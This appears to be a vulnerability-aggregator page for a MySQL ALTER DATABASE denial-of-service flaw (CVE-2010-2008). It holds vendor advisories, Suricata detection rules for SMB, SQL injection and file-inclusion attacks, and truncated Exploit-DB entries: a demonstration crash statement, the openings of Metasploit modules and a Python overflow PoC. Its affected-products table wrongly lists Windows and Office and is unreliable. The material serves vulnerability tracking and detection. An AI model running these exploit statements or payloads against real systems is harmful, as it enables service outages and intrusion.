CVE-2010-2008
published 2010-07-13CVE-2010-2008: MySQL before 5.1.48 allows remote authenticated users with alter database privileges to cause a denial of service (server crash and database loss) via an ALTER…
PriorityP424low3.5CVSS 2.0
AVNACMAuSCNINAP
EXPLOIT
EPSS
9.01%
94.6th percentile
MySQL before 5.1.48 allows remote authenticated users with alter database privileges to cause a denial of service (server crash and database loss) via an ALTER DATABASE command with a #mysql50# string followed by a . (dot), .. (dot dot), ../ (dot dot slash) or similar sequence, and an UPGRADE DATA DIRECTORY NAME command, which causes MySQL to move certain directories to the server data directory.
Affected
23 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| fedoraproject | fedora | — | — |
| msrc | microsoft_office_2007_service_pack_3 | — | — |
| msrc | microsoft_office_2010_service_pack_2 | — | — |
| msrc | microsoft_office_word_viewer | — | — |
| msrc | windows_10 | — | — |
| msrc | windows_10_version_1511 | — | — |
| msrc | windows_10_version_1607 | — | — |
| msrc | windows_10_version_1703 | — | — |
| msrc | windows_7 | — | — |
| msrc | windows_8.1 | — | — |
| msrc | windows_server_2008 | — | — |
| msrc | windows_server_2008_r2 | — | — |
| msrc | windows_server_2012 | — | — |
| msrc | windows_server_2012_r2 | — | — |
| msrc | windows_server_2016 | — | — |
| oracle | mysql | < 5.1.48 | 5.1.48 |
CVSS provenance
nvdv2.03.5LOWAV:N/AC:M/Au:S/C:N/I:N/A:P
vendor_redhat5.5MEDIUM
vendor_msrc4.4MEDIUM
vendor_ubuntu3.5LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Microsoft
Windows Uniscribe Information Disclosure Vulnerability
vendor_msrc·2017-06-13·CVSS 4.4
CVE-2017-0285 [MEDIUM] Windows Uniscribe Information Disclosure Vulnerability
Windows Uniscribe Information Disclosure Vulnerability
Description: An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user’s system.
There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.
The update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.
FAQ: I am running Office 2010, which is listed as affected software. Why am I not being offered the update?
The update, 3191848 (Ogl.dll), is not applicable to Office 2010 on Windows Server 2008 a
Ubuntu
MySQL vulnerabilities
vendor_ubuntu·2012-03-12
CVE-2007-5925 MySQL vulnerabilities
Title: MySQL vulnerabilities
Summary: Several security issues were fixed in MySQL.
Multiple security issues were discovered in MySQL and this update includes
new upstream MySQL versions to fix these issues.
MySQL has been updated to 5.1.61 in Ubuntu 10.04 LTS, Ubuntu 10.10,
Ubuntu 11.04 and Ubuntu 11.10. Ubuntu 8.04 LTS has been updated to
MySQL 5.0.95.
In addition to security fixes, the updated packages contain bug fixes, new
features, and possibly incompatible changes.
Please see the following for more information:
http://dev.mysql.com/doc/refman/5.1/en/news-5-1-x.html
http://dev.mysql.com/doc/refman/5.0/en/news-5-0-x.html
http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html
Instructions: In general, a standard system update will make all the necessary changes.
Ubuntu
MySQL vulnerabilities
vendor_ubuntu·2010-11-11·CVSS 3.5
CVE-2010-2008 [LOW] MySQL vulnerabilities
Title: MySQL vulnerabilities
It was discovered that MySQL incorrectly handled certain requests with the
UPGRADE DATA DIRECTORY NAME command. An authenticated user could exploit
this to make MySQL crash, causing a denial of service. This issue only
affected Ubuntu 9.10 and 10.04 LTS. (CVE-2010-2008)
It was discovered that MySQL incorrectly handled joins involving a table
with a unique SET column. An authenticated user could exploit this to make
MySQL crash, causing a denial of service. This issue only affected Ubuntu
6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS. (CVE-2010-3677)
It was discovered that MySQL incorrectly handled NULL arguments to IN() or
CASE operations. An authenticated user could exploit this to make MySQL
crash, causing a denial of service. This issue only affected Ubuntu 9.10
Red Hat
kernel: Xen Dom0 crash with Windows 2008 R2 64bit DomU + GPLPV
vendor_redhat·2010-09-20·CVSS 5.5
CVE-2010-4238 [MEDIUM] kernel: Xen Dom0 crash with Windows 2008 R2 64bit DomU + GPLPV
kernel: Xen Dom0 crash with Windows 2008 R2 64bit DomU + GPLPV
The vbd_create function in Xen 3.1.2, when the Linux kernel 2.6.18 on Red Hat Enterprise Linux (RHEL) 5 is used, allows guest OS users to cause a denial of service (host OS panic) via an attempted access to a virtual CD-ROM device through the blkback driver. NOTE: some of these details are obtained from third party information.
Red Hat
mysql: remote authenticated DoS via ALTER DATABASE
vendor_redhat·2010-07-06·CVSS 3.5
CVE-2010-2008 [LOW] mysql: remote authenticated DoS via ALTER DATABASE
mysql: remote authenticated DoS via ALTER DATABASE
MySQL before 5.1.48 allows remote authenticated users with alter database privileges to cause a denial of service (server crash and database loss) via an ALTER DATABASE command with a #mysql50# string followed by a . (dot), .. (dot dot), ../ (dot dot slash) or similar sequence, and an UPGRADE DATA DIRECTORY NAME command, which causes MySQL to move certain directories to the server data directory.
Package: mysql (Red Hat Enterprise Linux 6) - Not affected
Red Hat
eclipse: Help Content web application vulnerable to multiple XSS flaws
vendor_redhat·2008-04-24·CVSS 4.3
CVE-2008-7271 [MEDIUM] CWE-79 eclipse: Help Content web application vulnerable to multiple XSS flaws
eclipse: Help Content web application vulnerable to multiple XSS flaws
Multiple cross-site scripting (XSS) vulnerabilities in the Help Contents web application (aka the Help Server) in Eclipse IDE, possibly 3.3.2, allow remote attackers to inject arbitrary web script or HTML via (1) the searchWord parameter to help/advanced/searchView.jsp or (2) the workingSet parameter in an add action to help/advanced/workingSetManager.jsp, a different issue than CVE-2010-4647.
Package: eclipse (Red Hat Enterprise Linux 5) - Will not fix
Package: eclipse (Red Hat Enterprise Linux 6) - Not affected
GHSA
GHSA-x8g4-4q7f-5fwx: MySQL before 5
ghsa_unreviewed·2022-05-13
CVE-2010-2008 [LOW] CWE-77 GHSA-x8g4-4q7f-5fwx: MySQL before 5
MySQL before 5.1.48 allows remote authenticated users with alter database privileges to cause a denial of service (server crash and database loss) via an ALTER DATABASE command with a #mysql50# string followed by a . (dot), .. (dot dot), ../ (dot dot slash) or similar sequence, and an UPGRADE DATA DIRECTORY NAME command, which causes MySQL to move certain directories to the server data directory.
Suricata
ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (5)
suricata·2010-07-30
CVE-2008-4250 ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (5)
ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (5)
Rule: alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (5)"; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 5C 00 2E 00 2E 00 5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; classtype:attempted-admin; sid:2008694; rev:5; metadata:created_at 2010_07_30, cve CVE_2008_4250, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Suricata
ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (11)
suricata·2010-07-30
CVE-2008-4250 ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (11)
ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (11)
Rule: alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (11)"; flow:established,to_server; content:"|0B|"; offset:2; depth:1; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; classtype:attempted-admin; sid:2008701; rev:5; metadata:created_at 2010_07_30, cve CVE_2008_4250, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Suricata
ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (23)
suricata·2010-07-30
CVE-2008-4250 ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (23)
ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (23)
Rule: alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (23)"; flow:established,to_server; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"/../"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; classtype:attempted-admin; sid:2008713; rev:5; metadata:created_at 2010_07_30, cve CVE_2008_4250, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Suricata
ET WEB_SPECIFIC_APPS Experts answer.php question_id parameter SQL Injection
suricata·2010-07-30
CVE-2008-5267 ET WEB_SPECIFIC_APPS Experts answer.php question_id parameter SQL Injection
ET WEB_SPECIFIC_APPS Experts answer.php question_id parameter SQL Injection
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Experts answer.php question_id parameter SQL Injection"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/answer.php?"; nocase; content:"question_id="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:cve,2008-5267; reference:url,milw0rm.com/exploits/5776; reference:bugtraq,29642; classtype:web-application-attack; sid:2008931; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, cve CVE_2008_5267, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2024_03_06, mitre_tactic_id TA0001, mitre_tacti
Suricata
ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Remote File Inclusion
suricata·2010-07-30·CVSS 10.0
CVE-2008-5063 [CRITICAL] ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Remote File Inclusion
ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Remote File Inclusion
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Remote File Inclusion"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/ADM_Pagina.php?"; nocase; content:"Tipo="; nocase; pcre:"/Tipo=\s*(?:https?|ftps?|php)\:\//i"; reference:cve,CVE-2008-5063; reference:url,vupen.com/english/advisories/2008/3093; reference:url,secunia.com/advisories/32645; classtype:web-application-attack; sid:2009395; rev:7; metadata:created_at 2010_07_30, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_06, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Expl
Suricata
ET WEB_SPECIFIC_APPS Hedgehog CMS footer.php c_temp_path Remote File Inclusion
suricata·2010-07-30·CVSS 9.3
CVE-2008-2898 [CRITICAL] ET WEB_SPECIFIC_APPS Hedgehog CMS footer.php c_temp_path Remote File Inclusion
ET WEB_SPECIFIC_APPS Hedgehog CMS footer.php c_temp_path Remote File Inclusion
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Hedgehog CMS footer.php c_temp_path Remote File Inclusion"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/includes/footer.php?"; nocase; content:"c_temp_path"; nocase; pcre:"/c_temp_path=\s*(https?|ftps?|php)\:\//i"; reference:cve,CVE-2008-2898; reference:url,secunia.com/advisories/30778/; reference:url,milw0rm.com/exploits/8028; classtype:web-application-attack; sid:2009232; rev:8; metadata:created_at 2010_07_30, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_06, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_tec
Suricata
ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (2)
suricata·2010-07-30
CVE-2008-4250 ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (2)
ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (2)
Rule: alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (2)"; flow:established,to_server; content:"|00 2e 00 2e 00 2f 00 2e 00 2e 00 2f 00 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 87|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; classtype:attempted-admin; sid:2008721; rev:5; metadata:created_at 2010_07_30, cve CVE_2008_4250, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Suricata
ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (14)
suricata·2010-07-30
CVE-2008-4250 ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (14)
ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (14)
Rule: alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (14)"; flow:established,to_server; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 2F 00 2E 00 2E 00 2F|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; classtype:attempted-admin; sid:2008704; rev:5; metadata:created_at 2010_07_30, cve CVE_2008_4250, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Suricata
ET WEB_SPECIFIC_APPS Possible Apache Tomcat Host Manager Cross Site Scripting Attempt
suricata·2010-07-30
CVE-2008-1947 ET WEB_SPECIFIC_APPS Possible Apache Tomcat Host Manager Cross Site Scripting Attempt
ET WEB_SPECIFIC_APPS Possible Apache Tomcat Host Manager Cross Site Scripting Attempt
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Possible Apache Tomcat Host Manager Cross Site Scripting Attempt"; flow:established,to_server; http.uri; content:"/host-manager/html/add"; nocase; content:"method="; nocase; pcre:"/(script|img|src|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick)/i"; reference:url,www.securityfocus.com/bid/29502/info; reference:cve,2008-1947; classtype:web-application-attack; sid:2010146; rev:6; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, cve CVE_2008_1947, deployment Datacenter, confidence Medium, signature_severity Major, tag XSS, tag Cross_Site_Scripting, updated_at 2020_09_1
Suricata
ET WEB_SPECIFIC_APPS Cacti SQL Injection Vulnerability tree.php leaf_id INSERT
suricata·2010-07-30·CVSS 7.5
CVE-2008-0785 [HIGH] ET WEB_SPECIFIC_APPS Cacti SQL Injection Vulnerability tree.php leaf_id INSERT
ET WEB_SPECIFIC_APPS Cacti SQL Injection Vulnerability tree.php leaf_id INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Cacti SQL Injection Vulnerability tree.php leaf_id INSERT"; flow:established,to_server; http.uri; content:"tree.php?"; nocase; content:"leaf_id="; nocase; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2008-0785; reference:bugtraq,27749; classtype:web-application-attack; sid:2007895; rev:10; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_
Suricata
ET WEB_SPECIFIC_APPS Cyberfolio css.php theme Parameter Local File Inclusion
suricata·2010-07-30·CVSS 6.8
CVE-2008-6265 [MEDIUM] ET WEB_SPECIFIC_APPS Cyberfolio css.php theme Parameter Local File Inclusion
ET WEB_SPECIFIC_APPS Cyberfolio css.php theme Parameter Local File Inclusion
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Cyberfolio css.php theme Parameter Local File Inclusion"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/portfolio/css.php?"; fast_pattern; nocase; content:"theme="; nocase; http.uri.raw; url_decode; content:"|2e 2e 2f|"; reference:cve,CVE-2008-6265; reference:url,milw0rm.com/exploits/7065; reference:url,vupen.com/english/advisories/2008/3070; reference:bugtraq,32218; classtype:web-application-attack; sid:2009764; rev:9; metadata:affected_product Web_Server_Applications, attack_target Server, created_at 2010_07_30, deployment Perimeter, deployment Internal, deployment Datacenter, confidence High, signat
Suricata
ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Remote File Inclusion
suricata·2010-07-30·CVSS 9.3
CVE-2008-2898 [CRITICAL] ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Remote File Inclusion
ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Remote File Inclusion
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Remote File Inclusion"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/includes/header.php?"; nocase; content:"c_temp_path"; nocase; pcre:"/c_temp_path=\s*(https?|ftps?|php)\:\//i"; reference:cve,CVE-2008-2898; reference:url,secunia.com/advisories/30778/; reference:url,milw0rm.com/exploits/5904; classtype:web-application-attack; sid:2009233; rev:8; metadata:created_at 2010_07_30, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_06, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_tec
Suricata
ET WEB_SPECIFIC_APPS Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt
suricata·2010-07-30
CVE-2008-2165 ET WEB_SPECIFIC_APPS Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt
ET WEB_SPECIFIC_APPS Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt"; flow:established,to_server; http.uri; content:"/ekgnkm/AccessCodeStart.asp"; nocase; pcre:"/(script|img|src|alert|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick)/i"; reference:url,www.securityfocus.com/bid/29191/info; reference:cve,2008-2165; classtype:attempted-user; sid:2010506; rev:7; metadata:created_at 2010_07_30, cve CVE_2008_2165, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_10;)
Suricata
ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (9)
suricata·2010-07-30
CVE-2008-4250 ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (9)
ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (9)
Rule: alert udp any any -> $HOME_NET 139 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (9)"; content:"|20 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|00 2E 00 2E 00 2F 00 2E 00 2E 00 2F|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; classtype:attempted-admin; sid:2008698; rev:5; metadata:created_at 2010_07_30, cve CVE_2008_4250, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Suricata
ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (12)
suricata·2010-07-30
CVE-2008-4250 ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (12)
ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (12)
Rule: alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (12)"; flow:established,to_server; content:"|1F 00|"; content:"|C8 4F 32 4B 70 16 D3 01 12 78 5A 47 BF 6E E1 88|"; content:"|5C|..|5C|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx; reference:cve,2008-4250; reference:url,www.kb.cert.org/vuls/id/827267; classtype:attempted-admin; sid:2008702; rev:6; metadata:created_at 2010_07_30, cve CVE_2008_4250, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Suricata
ET SCADA CitectSCADA ODBC Overflow Attempt
suricata·2010-07-30
CVE-2008-2639 ET SCADA CitectSCADA ODBC Overflow Attempt
ET SCADA CitectSCADA ODBC Overflow Attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 20222 (msg:"ET SCADA CitectSCADA ODBC Overflow Attempt"; flow:established,to_server; dsize:4; byte_test:4,>,399,0; reference:cve,2008-2639; reference:url,www.digitalbond.com/index.php/2008/09/08/ids-signature-for-citect-vuln/; reference:url,digitalbond.com/tools/quickdraw/vulnerability-rules; classtype:attempted-user; sid:2008542; rev:8; metadata:created_at 2010_07_30, cve CVE_2008_2639, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Exploit-DB
Alstrasoft e-Friends 4.96 - Multiple Vulnerabilities
exploitdb·2010-10-27
CVE-2008-5751 Alstrasoft e-Friends 4.96 - Multiple Vulnerabilities
Alstrasoft e-Friends 4.96 - Multiple Vulnerabilities
---
AlstraSoft E-Friends 4.96 Multiple Remote Vulnerabilities
Name AlstraSoft E-Friends
Vendor http://www.alstrasoft.com
Versions Affected 4.96
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-10-27
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
I. ABOUT THE APPLICATION
AlstraSoft E-Friends is an online social networking
software that allows you to start your own site just like
Friendster and MySpace.
Other versions could be vulnerable.
II. DESCRIPTION
Many parameters are not properly sanitised before being
used in SQL queries and from the PHP's upload functions.
III. ANALYSIS
Summary:
A) Arbitrary
Exploit-DB
Microsoft Works 7 - 'WkImgSrv.dll' WKsPictureInterface() ActiveX (Metasploit)
exploitdb·2010-09-25
CVE-2008-1898 Microsoft Works 7 - 'WkImgSrv.dll' WKsPictureInterface() ActiveX (Metasploit)
Microsoft Works 7 - 'WkImgSrv.dll' WKsPictureInterface() ActiveX (Metasploit)
---
##
# $Id: msworks_wkspictureinterface.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit',
'Description' => %q{
The Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker
to execute arbitrary code on a system. By passing a negative integer to the
WksPictureInterface method, an attacker could execute arbitrary code on the system
with privil
Exploit-DB
Ultra Shareware Office Control - ActiveX HttpUpload Buffer Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2008-3878 Ultra Shareware Office Control - ActiveX HttpUpload Buffer Overflow (Metasploit)
Ultra Shareware Office Control - ActiveX HttpUpload Buffer Overflow (Metasploit)
---
##
# $Id: ultraoffice_httpupload.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in Ultra Shareware's Office
Control. When processing the 'HttpUpload' method, the arguments are concatenated
together to form a command line to run a bundled version of cURL. If the command
fails to run
Exploit-DB
VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2008-5492 VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow (Metasploit)
VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow (Metasploit)
---
##
# $Id: verypdf_pdfview.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow',
'Description' => %q{
The VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow
because it fails to properly bounds-check user-supplied data before copying
it into an insufficiently sized memory buffer. An attacker can exploit this issue
to execute arbitrary code within the context of the affected ap
Exploit-DB
Microsoft Internet Explorer - Data Binding Memory Corruption (MS08-078) (Metasploit)
exploitdb·2010-09-20
CVE-2008-4844 Microsoft Internet Explorer - Data Binding Memory Corruption (MS08-078) (Metasploit)
Microsoft Internet Explorer - Data Binding Memory Corruption (MS08-078) (Metasploit)
---
##
# $Id: ms08_078_xml_corruption.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 HttpClients::IE,
# :ua_minver => "7.0",
# :ua_maxver => "7.0",
# :javascript => true,
# :os_name => OperatingSystems::WINDOWS,
# :vuln_test => nil, # no way to test without just trying it
#})
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer Data Binding Memory Corruption',
'Description' => %q{
This module
Exploit-DB
Oracle MySQL - 'ALTER DATABASE' Remote Denial of Service
exploitdb·2010-08-03
CVE-2010-2008 Oracle MySQL - 'ALTER DATABASE' Remote Denial of Service
Oracle MySQL - 'ALTER DATABASE' Remote Denial of Service
---
A vulnerability was reported in MySQL. A remote authenticated user can cause denial of service conditions.
This issue affects versions prior to MySQL 5.1.48.
A remote authenticated user can send a specially crafted ALTER DATABASE command to cause the target server to move a data directory into a new subdirectory, causing the data directory to become unusable.
A demonstration exploit request is provided [where "" is "." or ".." or is a sequence that begins with "./" or "../"]:
ALTER DATABASE `#mysql50#` UPGRADE DATA DIRECTORY NAME
Vendor advisory at:
http://dev.mysql.com/doc/refman/5.1/en/news-5-1-48.html
Exploit-DB
BEA Weblogic - Transfer-Encoding Buffer Overflow (Metasploit)
exploitdb·2010-07-08
CVE-2008-4008 BEA Weblogic - Transfer-Encoding Buffer Overflow (Metasploit)
BEA Weblogic - Transfer-Encoding Buffer Overflow (Metasploit)
---
##
# $Id: bea_weblogic_transfer_encoding.rb 9744 2010-07-08 23:34:50Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 [ /Apache/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'BEA Weblogic Transfer-Encoding Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in the BEA
Weblogic Apache plugin. This vulnerability exists in the
error reporti
Exploit-DB
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)
exploitdb·2010-07-03
CVE-2009-3103 Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)
---
##
# $Id: ms09_050_smb2_negotiate_func_index.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',
'Description' => %q{
This module exploits an out of bounds function table dereference in the SMB
request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7
release candidates (not RTM), and Windows 2008 Serv
Exploit-DB
File Sharing Wizard 1.5.0 - Buffer Overflow (PoC)
exploitdb·2010-06-15
CVE-2010-2330 File Sharing Wizard 1.5.0 - Buffer Overflow (PoC)
File Sharing Wizard 1.5.0 - Buffer Overflow (PoC)
---
#!/usr/bin/python
# http://www.sharing-file.net/
# File Sharing Wizard Version 1.5.0 build on 26-8-2008
#
# controlling EAX
# ESP points to our buffer
# buffer grows if we increase our string
#
# more details on http://www.s3cur1ty.de
# have fun m1k3 [at] m1k3 [dot] at
import socket
import sys
if len(sys.argv) "
sys.exit(1)
ips = sys.argv[1]
port = int(sys.argv[2])
string = "A"*51
